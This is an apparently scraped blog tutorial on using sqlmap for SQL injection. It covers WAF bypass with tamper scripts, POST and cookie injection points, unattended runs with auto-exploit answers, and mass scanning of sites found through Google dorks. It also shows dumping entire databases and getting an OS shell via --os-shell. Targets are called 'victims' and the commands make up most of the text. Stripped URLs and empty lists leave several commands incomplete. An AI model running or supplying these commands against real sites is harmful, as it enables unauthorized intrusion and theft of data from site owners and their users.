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Advanced Sqlmap - Metasploit for SQL Injection

Advanced Sqlmap - Metasploit for SQL Injection.

[?] What is SQL Injection?
I'm not describe what is SQL Injection in this post, please check
[?] Why we use sqlmap?
- This is a automatic SQL injection tool.
- Provide many advanced technique that I'll show you in this post.
- Open source and highly scalable.
- Easy to install.
[*] Sqlmap source
All you need is python 2.x and Internet connection:
git clone --depth 1 sqlmap-dev

[*] Well, now I'm gonna show you some advanced technique.
[Bypass WAF using sqlmap tamper script]

python -u '’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs

You can also use more tamper script but it depend on your victim DBMS. (use too much tamper script is not RECOMMEND)
Here is some tamper script for specific DBMS:
- General Tamper testing:


- MySQL:

[Run sqlmap with custom position and POST request]
So what if your target URL is:
How can we use -p option in sqlmap? Just add an '*' to indicate position that you want to inject sqlmap payload.

python -u '*’ --dbs

Or even POST request like this:

POST /login.php HTTP/1.1

Save that POST request to a file, for example request.txt
python -r request.txt -p 'user' --dbs

You can also place '*' in everywhere in request.txt and run sqlmap. (for example cookie injection :D)

[Running sqlmap without interact]
Normally when you run sqlmap, you'll get some question from sqlmap like this:

This is useful but sometimes bother you. So run command below will help you with that.

python -u '’ -p 'id' --batch

--batch : use the default behaviour, for example:
it is not recommended -- [snip] -- Do you want to skip? [Y/n]
In this case 'Y' is default and use --batch option will skip that question and use 'Y'

python -u '’ -p 'id' --answer="extending=N,follow=N,keep=N,exploit=Y"

You can also use --answer option to pre-answer some question.
- extending: increase level and risk.
- follow: follow redirection.
- keep: keep running or not if connection timeout.
- exploit: exploit or not if target exploitable.

[Running sqlmap with Google Dork]
Google dork for sql injection:
In this post I'm gonna use: inurl:"article.php?id=" just for a demo.

python -g 'inurl:"article.php?id="' --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --dbs --thread 5

You can even running sqlmap with list of link from Google Dork.


Save that file in simple.txt and use the command below:
python -m simple.txt --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --thread 5 --dbs --output-dir="/tmp/data-sqli/"

-m: file that contain links need to test.
--output-dir: custom place output of sqlmap session (default is '.sqlmap/output/')

So what if we crawl all the link from Google Dork to running sqlmap(use Burp Suite or custom python script).
I already created a python script to do that shit :D.

[Running sqlmap with Burp Suite]
You need to install SQLiPy extension on Burp, check it out on official Burp Suite site

Run sqlmapapi server:
python -s -H <IP> -p <Port>
For instance:
python -s -H -p 8775

Send request to SQLiPy and you good to go.

[Some technique to dump data from vulnerable target]

Enumerate DBMS databases:
python -u '’ -p 'id' --dbs

Dump all DBMS databases tables entries:
python -u '’ -p 'id' --dump-all

Enumerate DBMS database tables:
python -u '’ -p 'id' -D somedb --tables

Dump data from specific database or talbes:
python -u '’ -p 'id' -D somedb -T sometable --dump

[Some other advanced technique]
Show advanced help:
python -hh

Specific DBMS:
--dbms: specific DBMS to save your time (e.g --dbms=mysql)

Revershell with sqlmap:
--os-shell: revershsell by upload UDF function (not work with all case)

Custom sql query:
--sql-shell: Prompt for an interactive SQL shell (basically you can run any sql query)


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